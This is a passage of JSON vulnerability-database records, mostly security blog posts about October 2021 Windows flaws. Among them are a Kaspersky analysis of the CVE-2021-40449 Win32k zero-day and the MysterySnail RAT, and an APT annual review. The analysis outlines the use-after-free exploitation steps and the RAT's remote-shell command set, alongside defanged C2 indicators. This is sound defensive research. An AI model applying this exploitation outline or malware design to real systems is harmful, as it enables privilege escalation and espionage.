Spooler. The flaw was discovered by the same researchers credited with the discovery of one of two vulnerabilities that became known as **PrintNightmare** -- the widespread exploitation of a critical Print Spooler flaw that forced Microsoft [to issue an emergency security update back in July](<https://krebsonsecurity.com/2021/07/microsoft-issues-emergency-patch-for-windows-flaw/>). Microsoft assesses CVE-2021-36970 as &quot;exploitation more likely.&quot;\n\n&quot;While no details have been shared publicly about the flaw, this is definitely one to watch for, as we saw a constant stream of Print Spooler-related vulnerabilities patched over the summer while ransomware groups began incorporating PrintNightmare into their affiliate playbook,&quot; said **Satnam Narang**, staff research engineer at **Tenable**. &quot;We strongly encourage organizations to apply these patches as soon as possible.&quot;\n\n[CVE-2021-26427](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26427>) is another important bug in **Microsoft Exchange Server**, which has been under siege lately from attackers. In March, threat actors pounced on four separate zero-day flaws in Exchange that allowed them to [siphon email from and install backdoors at hundreds of thousands of organizations](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>).\n\nThis month&#x27;s Exchange bug earned a CVSS score of 9.0 (10 is the most dangerous). **Kevin Breen** of I**mmersive Labs** points out that Microsoft has marked this flaw as less likely to be exploited, probably because an attacker would already need access to your network before using the vulnerability.\n\n&quot;Email servers will always be prime targets, simply due to the amount of data contained in emails and the range of possible ways attackers could use them for malicious purposes. While it\u2019s not right at the top of my list of priorities to patch, it\u2019s certainly one to be wary of.&quot;\n\nAlso today, Adobe issued security updates for a range of products, including [Adobe Reader and Acrobat](<https://helpx.adobe.com/security/products/acrobat/apsb21-104.html>), **Adobe Commerce**, and **Adobe Connect**.\n\nFor a complete rundown of all patches released today and indexed by severity, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft+October+2021+Patch+Tuesday/27928/>) from the **SANS Internet Storm Center**, and [the Patch Tuesday data](<https://patchtuesdaydashboard.com/>) put together by **Morphus Labs**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/2021/defcon-2-august-updates-include-print-spooler-fixes/>) frequently has the lowdown on any patches that are causing problems for Windows users.\n\nOn that note, before you update _please_ make sure you have backed up your system and/or important files. It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has some [built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nIf you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a decent chance other readers have experienced the same and may chime in here with useful tips.", "cvss3": {}, "published": "2021-10-12T19:52:09", "type": "krebs", "title": "Patch Tuesday, October 2021 Edition", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26427", "CVE-2021-30883", "CVE-2021-36970", "CVE-2021-38672", "CVE-2021-40449", "CVE-2021-40461", "CVE-2021-40486"], "modified": "2021-10-12T19:52:09", "id": "KREBS:99411879A64BD5F899F5CD4CD59A9A1C", "href": "https://krebsonsecurity.com/2021/10/patch-tuesday-october-2021-edition/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2021-10-12T18:35:34", "description": "\n\n## Executive Summary\n\nIn late August and early September 2021, Kaspersky technologies detected attacks with the use of an elevation of privilege exploit on multiple Microsoft Windows servers. The exploit had numerous debug strings from an older, publicly known exploit for vulnerability [CVE-2016-3309](<https://github.com/siberas/CVE-2016-3309_Reloaded/>), but closer analysis revealed that it was a zero-day. We discovered that it was using a previously unknown vulnerability in the Win32k driver and exploitation relies heavily on a technique to leak the base addresses of kernel modules. We promptly reported these findings to Microsoft. The information disclosure portion of the exploit chain was identified as not bypassing a security boundary, and was therefore not fixed. Microsoft assigned [CVE-2021-40449](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40449>) to the use-after-free vulnerability in the Win32k kernel driver and it was patched on October 12, 2021, as a part of the October Patch Tuesday.\n\nBesides finding the zero-day in the wild, we analyzed the malware payload used along with the zero-day exploit, and found that variants of the malware were detected in widespread espionage campaigns against IT companies, military/defense contractors, and diplomatic entities.\n\nWe are calling this cluster of activity MysterySnail. Code similarity and re-use of C2 infrastructure we discovered allowed us to connect these attacks with the actor known as IronHusky and Chinese-speaking APT activity dating back to 2012.\n\n## Elevation of privilege exploit\n\nThe discovered exploit is written to support the following Windows products:\n\n * Microsoft Windows Vista\n * Microsoft Windows 7\n * Microsoft Windows 8\n * Microsoft Windows 8.1\n * Microsoft Windows Server 2008\n * Microsoft Windows Server 2008 R2\n * Microsoft Windows Server 2012\n * Microsoft Windows Server 2012 R2\n * Microsoft Windows 10 (build 14393)\n * Microsoft Windows Server 2016 (build 14393)\n * Microsoft Windows 10 (build 17763)\n * Microsoft Windows Server 2019 (build 17763)\n\nThe list of supported products and supported Windows 10 build numbers, explicit declaration of server OSs and the fact that exploits were only discovered in attacks on servers, all lead us to believe the exploit was developed and advertised as a solution to elevate privileges on servers.\n\nCVE-2021-40449 is a use-after-free vulnerability in Win32k&#x27;s NtGdiResetDC function. As with many other Win32k vulnerabilities, the root cause of this vulnerability lies in the ability to set user-mode callbacks and execute unexpected API functions during execution of those callbacks. The CVE-2021-40449 is triggered when the function ResetDC is executed a second time for the same handle during execution of its own callback. The exploitation process for this vulnerability is as follows:\n\n 1. A user-mode call to ResetDC executes syscall NtGdiResetDC and its inner function GreResetDCInternal. This function gets a pointer to a PDC object, and then performs a call to function hdcOpenDCW.\n 2. Function hdcOpenDCW performs a user-mode callback and it can be used to execute ResetDC for the same handle a second time.\n 3. If an exploit executes ResetDC during a callback, NtGdiResetDC and GreResetDCInternal are executed again for the same DC.\n 4. If an exploit ignores all the callbacks during the second call to GreResetDCInternal, this function will be executed as intended. It will create a new DC and get rid of the old one (the PDC object is destroyed).\n 5. In the callback, after the second ResetDC call has completed, the exploit can reclaim the freed memory of the PDC object and finish the execution of the callback.\n 6. After execution of the callback, function hdcOpenDCW returns to GreResetDCInternal, but the pointer retrieved in step (1) is now a dangling pointer \u2013 it points to the memory of the previously destroyed PDC object.\n 7. In the late stage of GreResetDCInternal execution, a malformed PDC object can be used to perform a call to an arbitrary kernel function with controlled parameters.\n\nIn the discovered exploit attackers are able to achieve the desired state of memory with the use of GDI palette objects and use a single call to a kernel function to build a primitive for reading and writing kernel memory. This step is easily accomplished, because the exploit process is running with Medium IL and therefore it&#x27;s possible to use publicly known techniques to leak kernel addresses of currently loaded drivers/kernel modules. In our opinion, it would be preferable if the Medium IL processes had limited access to such functions as NtQuerySystemInformation or [EnumDeviceDrivers](<https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/>).\n\n## MysterySnail RAT\n\nOur deep dive into the MysterySnail RAT family started with an analysis of a previously unknown remote shell-type Trojan that was intended to be executed by an elevation of privilege exploit. The sample which we analyzed was also [uploaded](<https://www.virustotal.com/gui/file/b7fb3623e31fb36fc3d3a4d99829e42910cad4da4fa7429a2d99a838e004366e>) to VT on August 10, 2021. The sample is very big \u2013 8.29MB. One of the reasons for the file size is that it&#x27;s statically compiled with the OpenSSL library and contains unused code and data belonging to that library. But the main reason for its size is the presence of two very large functions that do nothing but waste processor clock cycles. These functions also &quot;use&quot; randomly generated strings that are also present in a binary.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/11153312/MysterySnail_attacks_with_Windows_zero-day_01.png>)\n\n**_Random strings used by anti-analysis functions_**\n\nWe assume these two functions are used as an AV-evasion technique for the purpose of anti-emulation. This theory is supported by the presence of other redundant logics and the presence of a relatively large number of exported functions while the real work is performed by only one of them.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/11153357/MysterySnail_attacks_with_Windows_zero-day_02.png>)\n\n**_Names of exported functions; the actual business logic is executed from function &quot;GetInfo&quot;_**\n\nThe sample has two hardcoded URLs present in plain text \u2013 &quot;www[.]disktest[.]com&quot; and &quot;www[.]runblerx[.]com&quot;. They are put into class variables for intended use, but remain unused; the real C2 address is decoded by a single byte xor \u2013 &quot;http[.]ddspadus[.]com&quot;.\n\nThe malware enumerates the values under the &quot;Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer&quot; registry key and uses them to request tunneling through a proxy server in case it fails to connect to the C2 directly.\n\nThe malware itself is not very sophisticated and has functionality similar to many other remote shells. But it still somehow stands out, with a relatively large number of implemented commands and extra capabilities like monitoring for inserted disk drives and the ability to act as a proxy.\n\nInbound and outbound commands have the same binary-based format that is provided below. All communication is encrypted with SSL.\n\n**Offset** | **Description** \n---|--- \n0 | Size of additional data \n4 | Session ID \n8 | Command ID \n0xC | Additional data \n \n**_Format of communication commands_**\n\nBefore receiving any commands, the malware gathers and sends general information about the victim machine. This information includes:\n\n * Computer name\n * Current OEM code-page/default identifier\n * Windows product name\n * Local IP address\n * Logged-in user name\n * Campaign name\n\nOne interesting fact is that &quot;Campaign name&quot; by default is set to &quot;windows&quot;. This name gets overwritten, but it might indicate there are versions of the same RAT compiled for other platforms.\n\nIn total, the RAT implements 20 commands. Their description and command IDs are provided in the table below.\n\n**Command ID** | **Description** \n---|--- \n1F4h | Launch interactive cmd.exe shell. Before launch cmd.exe is copied to the temp folder with a different name \n1F5h | Spawn new process \n1F6h | Spawn new process (console) \n1F7h | Get existing disk drives and their type. This function also works in the background, checking for new drives \n1F8h | Create (upload) new file. If a file exists, append data to it \n1FAh | Get directory list \n1FBh | Kill arbitrary process \n1FFh | Delete file \n202h | Read file. If the file is too big, async read operation can be stopped with cmd 20Ch. \n205h | Re-connect \n208h | Set sleep time (in ms) \n209h | Shutdown network and exit \n20Ah | Exit \n20Bh | Kill interactive shell (created with cmd 1F4h) \n20Ch | Terminate file reading operation (started with cmd 202h) \n217h | No operation \n21Bh | Open proxy&#x27;ed connection to provided host. Up to 50 simultaneous connections are supported. \n21Ch | Send data to proxy&#x27;ed connection \n21Eh | Close all proxy connections \n21Fh | Close requested proxy connection \n \n**_List of commands supported by the RAT_**\n\nThe analysis of the MysterySnail RAT helped us discover campaigns using other variants of the analyzed malware as well as study and document the code changes made to this tool over a six-month period. We provide more info about these variants and campaigns in our private report.\n\nWith the help of Kaspersky Threat Attribution Engine (KTAE) and the discovery of early variants of MysterySnail RAT we were able to find direct code and functionality overlap with the malware attributed to the IronHusky actor. We were also able to discover the re-use of C2 addresses used in attacks by the Chinese-speaking APT as far back as 2012. This discovery links IronHusky to some of the older known activities.\n\nKaspersky products detect the CVE-2021-40449 exploit and related malware with the verdicts:\n\n * PDM:Exploit.Win32.Generic\n * PDM:Trojan.Win32.Generic\n * Trojan.Win64.Agent*\n\nKaspersky products detected these attacks with the help of the Behavioral Detection Engine and the Exploit Prevention component. CVE-2021-40449 is the latest addition to the long list of zero-days discovered in the wild with the help of our technologies. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone.\n\nMore information about these attacks and the actor behind them is available to customers of the Kaspersky Intelligence Reporting service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n_Kaspersky would like to thank Microsoft for their prompt analysis of the report and patches._\n\n## IoCs\n\nwww[.]disktest[.]com \nwww[.]runblerx[.]com \nhttp[.]ddspadus[.]com\n\nMD5 [e2f2d2832da0facbd716d6ad298073ca](<https://opentip.kaspersky.com/e2f2d2832da0facbd716d6ad298073ca/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \nSHA1 [ecdec44d3ce31532d9831b139ea04bf48cde9090](<https://opentip.kaspersky.com/ecdec44d3ce31532d9831b139ea04bf48cde9090/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \nSHA256 [b7fb3623e31fb36fc3d3a4d99829e42910cad4da4fa7429a2d99a838e004366e](<https://opentip.kaspersky.com/b7fb3623e31fb36fc3d3a4d99829e42910cad4da4fa7429a2d99a838e004366e/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-10-12T17:07:08", "type": "securelist", "title": "MysterySnail attacks with Windows zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3309", "CVE-2021-40449"], "modified": "2021-10-12T17:07:08", "id": "SECURELIST:EDEDB5540F9CBEF736A91ECDD708D038", "href": "https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-30T10:36:53", "description": "\n\nIn the Global Research and Analysis Team at Kaspersky, we track the ongoing activities of more than 900 advanced threat actors and activity clusters; you can find our quarterly overviews [here](<https://securelist.com/apt-trends-report-q1-2021/101967/>), [here](<https://securelist.com/apt-trends-report-q2-2021/103517/>) and [here](<https://securelist.com/apt-trends-report-q3-2021/104708/>)[.](<https://securelist.com/apt-trends-report-q3-2021/104708/>) For this annual review, we have tried to focus on what we consider to be the most interesting trends and developments of the last 12 months. This is based on our visibility in the threat landscape and it&#x27;s important to note that no single vendor has complete visibility into the activities of all threat actors.\n\n## Private sector vendors play a significant role in the threat landscape\n\nPossibly the biggest story of 2021, an investigation by the Guardian and 16 other media organizations, published in July, suggested that over 30,000 human rights activists, journalists and lawyers across the world may have been targeted using Pegasus. The report, called [Pegasus Project](<https://www.amnesty.org/en/latest/press-release/2021/07/the-pegasus-project/>), alleged that the software uses a variety of exploits, including several iOS zero-click zero-days. Based on forensic analysis of numerous mobile devices, Amnesty International&#x27;s Security Lab found that the software was repeatedly used in an abusive manner for surveillance. The list of targeted individuals includes 14 world leaders. Later that month, [representatives from the Israeli government visited the offices of NSO](<https://www.theguardian.com/news/2021/jul/29/israeli-authorities-inspect-nso-group-offices-after-pegasus-revelations>) as part of an investigation into the claims. And in October, India&#x27;s Supreme Court commissioned a technical committee [to investigate whether the government had used Pegasus to spy on its citizens](<https://www.theregister.com/2021/10/29/india_nso_pegasus_probe/>). In November, Apple announced that it was taking [legal action against NSO Group](<https://www.theguardian.com/technology/2021/nov/23/apple-sues-israeli-cyber-firm-nso-group>) for developing software that targets its users with &quot;malicious malware and spyware&quot;.\n\nDetecting infection traces from Pegasus and other advanced mobile malware is very tricky, and complicated by the security features of modern OSs such as iOS and Android. Based on our observations, this is further complicated by the deployment of non-persistent malware, which leaves almost no traces after reboot. Since many forensics frameworks require a device jailbreak, this results in the malware being removed from memory during the reboot. Currently, several methods can be used for detection of Pegasus and other mobile malware. [MVT (Mobile Verification Toolkit](<https://github.com/mvt-project/mvt>)) from Amnesty International is free, open source and allows technologists and investigators to inspect mobile phones for signs of infection. MVT is further boosted by a list of IoCs (indicators of compromise) collected from high profile cases and made available by Amnesty International.\n\n## Supply-chain attacks\n\nThere have been a number of high-profile supply-chain attacks in the last 12 months. Last December, it was reported that SolarWinds, a well-known IT managed services provider, had fallen victim to a sophisticated supply-chain attack. The company&#x27;s Orion IT, a solution for monitoring and managing customers&#x27; IT infrastructure, was compromised. This resulted in the deployment of a custom backdoor named Sunburst on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia.\n\nNot all supply-chain attacks have been that sophisticated. Early this year, an APT group that we track as BountyGlad compromised a certificate authority in Mongolia and replaced the digital certificate management client software with a malicious downloader. Related infrastructure was identified and used in multiple other incidents: this included server-side attacks on WebSphere and WebLogic services in Hong Kong, and Trojanized Flash Player installers on the client side.\n\nWhile investigating the artefacts of a supply-chain attack on an Asian government Certification Authority&#x27;s website, we discovered a Trojanized package that dates back to June 2020. Unravelling that thread, we identified a number of post-compromise tools in the form of plugins that were deployed using PhantomNet malware, which were in turn delivered using the aforementioned Trojanized packages. Our analysis of these plugins revealed similarities with the previously analyzed CoughingDown malware.\n\nIn April 2021, Codecov, provider of code coverage solutions, publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between January 31 and April 1. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user&#x27;s execution environments, collect code coverage reports and send the results to the Codecov infrastructure. This script compromise effectively constitutes a supply-chain attack.\n\nEarlier this year we discovered [Lazarus group](<https://securelist.com/tag/lazarus/>) campaigns using an updated DeathNote cluster. Our investigation revealed indications that point to Lazarus building supply-chain attack capabilities. In one case we found that the infection chain stemmed from legitimate South Korean security software executing a malicious payload; and in the second case, the target was a company developing asset monitoring solutions, an atypical victim for Lazarus. As part of the infection chain, Lazarus used a downloader named Racket, which they signed using a stolen certificate. The actor compromised vulnerable web servers and uploaded several scripts to filter and control the malicious implants on successfully breached victim machines.\n\nA previously unknown, suspected Chinese-speaking APT modified a fingerprint scanner software installer package on a distribution server in a country in East Asia. The APT modified a configuration file and added a DLL with a .NET version of a PlugX injector to the installer package. Employees of the central government in this country are required to use this biometric package to track attendance. We refer to this supply-chain incident and this particular PlugX variant as SmudgeX. The Trojanized installer appears to have been staged on the distribution server from March through June.\n\n## Exploiting vulnerabilities\n\nOn March 2, Microsoft reported a new APT actor named HAFNIUM, exploiting four zero-days in Exchange Server in what they called &quot;limited and targeted attacks&quot;. At the time, Microsoft claimed that, in addition to HAFNIUM, several other actors were exploiting them as well. In parallel, Volexity also reported the same Exchange zero-days being in use in early 2021. According to Volexity&#x27;s telemetry, some of the exploits in use are shared across several actors, besides the one Microsoft designates as HAFNIUM. Kaspersky telemetry revealed a spike in exploitation attempts for these vulnerabilities following the public disclosure and patch from Microsoft. During the first week of March, we identified approximately 1,400 unique servers that had been targeted, in which one or more of these vulnerabilities were used to obtain initial access. According to our telemetry, most exploitation attempts were observed for servers in Europe and the United States. Some of the servers were targeted multiple times by what appear to be different threat actors (based on the command execution patterns), suggesting the exploits had become available to multiple groups.\n\nWe also discovered a campaign active since mid-March targeting governmental entities in Europe and Asia using the same Exchange zero-day exploits. This campaign made use of a previously unknown malware family that we dubbed FourteenHi. Further investigation revealed traces of activity involving variants of this malware dating back a year. We also found some overlaps in these sets of activities with HAFNIUM in terms of infrastructure and TTPs as well as the use of ShadowPad malware during the same timeframe.\n\nOn January 25, the Google Threat Analysis Group (TAG) announced a state-sponsored threat actor had targeted security researchers. According to Google TAG&#x27;s blog, this actor used highly sophisticated social engineering, approached security researchers through social media, and delivered a compromised Visual Studio project file or lured them to their blog where a Chrome exploit was waiting for them. On March 31, Google TAG released an update on this activity showing another wave of fake social media profiles and a company the actor set up mid-March. We confirmed that several infrastructures on the blog overlapped with [our previously published](<https://securelist.com/lazarus-threatneedle/100803/>) reporting about Lazarus group&#x27;s ThreatNeedle cluster. Moreover, the malware mentioned by Google matched ThreatNeedle \u2013 malware that we have been tracking since 2018. While investigating associated information, a fellow external researcher confirmed that he was also compromised by this attack, sharing information for us to investigate. We discovered additional C2 servers after decrypting configuration data from the compromised host. The servers were still in use during our investigation, and we were able to get additional data related to the attack. We assess that the published infrastructure was used not only to target security researchers but also in other Lazarus attacks. We found a relatively large number of hosts communicating with the C2s at the time of our research.\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region. Further analysis revealed that this escalation of privilege (EoP) exploit had potentially been used in the wild since at least November 2020. We reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310. Various marks and artifacts left in the exploit meant that we were highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as Moses. Moses appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from Moses. While the EoP exploit was discovered in the wild, we weren&#x27;t able to directly tie its usage to any known threat actor that we currently track. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren&#x27;t able to capture a full exploit chain, so we don&#x27;t know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an EoP exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 \u2013 RS5, 18362 \u2013 19H1, 18363 \u2013 19H2, 19041 \u2013 20H1, 19042 \u2013 20H2) and exploited two distinct vulnerabilities in the Microsoft Windows OS kernel. We reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the information disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8 as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a remote shell-style backdoor that in turn connects to the C2 to get commands. Because we couldn&#x27;t find any connections or overlaps with a known actor, we named this cluster of activity PuzzleMaker.\n\nFinally, late this year, we detected a wave of attacks using an elevation of privilege exploit affecting server variants of the Windows operating system. Upon closer analysis, it turned out to be a zero-day use-after-free vulnerability in Win32k.sys that we reported to Microsoft and was consequently fixed as CVE-2021-40449. We analyzed the associated malware, dubbed the associated cluster MysterySnail and found infrastructure overlaps that link it to the IronHusky APT.\n\n## Firmware vulnerabilities\n\nIn September, we [provided an overview](<https://securelist.com/finspy-unseen-findings/104322/>) of the FinSpy PC implant, covering not only the Windows version, but also Linux and macOS versions. FinSpy is an infamous, commercial surveillance toolset that is used for &quot;legal surveillance&quot; purposes. Historically, several NGOs have repeatedly reported it being used against journalists, political dissidents and human rights activists. Historically, its Windows implant was represented by a single-stage spyware installer; and this version was detected and researched several times up to 2018. Since then, we have observed a decreasing detection rate for FinSpy for Windows. While the nature of this anomaly remained unknown, we began detecting some suspicious installer packages backdoored with Metasploit stagers. We were unable to attribute these packages to any threat actor until the middle of 2019 when we found a host that served these installers among FinSpy Mobile implants for Android. Over the course of our investigation, we found out that the backdoored installers are nothing more than first stage implants that are used to download and deploy further payloads before the actual FinSpy Trojan. Apart from the Trojanized installers, we also observed infections involving usage of a UEFI or MBR bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our report.\n\nTowards the end of Q3, we identified a previously unknown payload with advanced capabilities, delivered using two infection chains to various government organizations and telecoms companies in the Middle East. The payload makes use of a Windows kernel-mode rootkit to facilitate some of its activities and is capable of being persistently deployed through an MBR or a UEFI bootkit. Interestingly enough, some of the components observed in this attack have been formerly staged in memory by Slingshot agent on multiple occasions, whereby Slingshot is a post-exploitation framework that we covered in several cases in the past (not to be confused with the Slingshot APT). It is mainly known for being a proprietary commercial penetration testing toolkit officially designed for red team engagements. However, it&#x27;s not the first time that attackers appear to have taken advantage of it. One of our previous reports from 2019 covering FruityArmor&#x27;s activity showed that the threat group used the framework to target organizations across multiple industries in the Middle East, possibly by leveraging an unknown exploit in a messenger app as an infection vector. In a recent private intelligence report, we provided a drill-down analysis of the newly discovered malicious toolkit that we observed in tandem with Slingshot and how it was leveraged in clusters of activity in the wild. Most notably, we outlined some of the advanced features that are evident in the malware as well as its utilization in a particular long-standing activity against a high-profile diplomatic target in the Middle East.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-30T10:00:31", "type": "securelist", "title": "APT annual review 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-40449"], "modified": "2021-11-30T10:00:31", "id": "SECURELIST:1F59148E6615695438F94EF4956585AA", "href": "https://securelist.com/apt-annual-review-2021/105127/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-06-22T10:58:50", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40449, CVE-2021-40450.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-41357", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449", "CVE-2021-40450", "CVE-2021-41357"], "modified": "2021-10-20T00:00:00", "id": "AKB:9A5930ED-FA6C-489A-91EE-74D16A17A639", "href": "https://attackerkb.com/topics/7HgknEMIIX/cve-2021-41357", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-27T20:32:32", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40449, CVE-2021-41357.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-40450", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40449", "CVE-2021-40450", "CVE-2021-41357"], "modified": "2021-10-20T00:00:00", "id": "AKB:E1AE2609-3DC3-419D-B0AC-353401171F59", "href": "https://attackerkb.com/topics/mMKXhCyjRT/cve-2021-40450", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-31T08:34:53", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-40450, CVE-2021-41357.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed 